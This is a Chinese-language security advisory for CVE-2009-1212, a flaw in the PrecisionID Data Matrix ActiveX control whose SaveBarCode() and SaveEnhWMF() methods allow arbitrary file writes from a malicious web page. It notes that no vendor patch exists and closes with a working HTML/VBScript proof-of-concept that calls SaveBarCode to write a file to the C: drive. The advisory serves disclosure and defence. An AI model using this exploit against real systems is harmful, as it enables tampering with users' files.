BUGTRAQ ID: 34322
CVE(CAN) ID: CVE-2009-1212
PrecisionID Data Matrix是用于生成二维条码的工具。
PrecisionID所提供的DMATRIXLib.Datamatrix ActiveX控件没有正确地验证用户对SaveBarCode()和SaveEnhWMF()方式所提交的输入参数:
Sub SaveBarCode (
ByVal path As String
)
Sub SaveEnhWMF (
ByVal path As String
)
如果用户受骗访问了恶意网页并向上述方式传送了恶意参数的话,就可能导致向系统上任意位置写入文件。
PrecisionID Data Matrix ActiveX
临时解决方法:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.precisionid.com/” target=“_blank”>http://www.precisionid.com/</a>
<html>
<object classid=\'clsid:6C951D10-B07F-11DB-A6ED-0050C2490048\' id=\'target\' />
<script language=\'vbscript\'>
targetFile = \"C:\\WINDOWS\\system32\\PRECIS~2.DLL\"
prototype = \"Sub SaveBarCode ( ByVal path As String )\"
memberName = \"SaveBarCode\"
progid = \"DMATRIXLib.Datamatrix\"
argCount = 1
arg1=\"C:\\sh2kerr.pwn\"
target.SaveBarCode arg1
</script>
</html>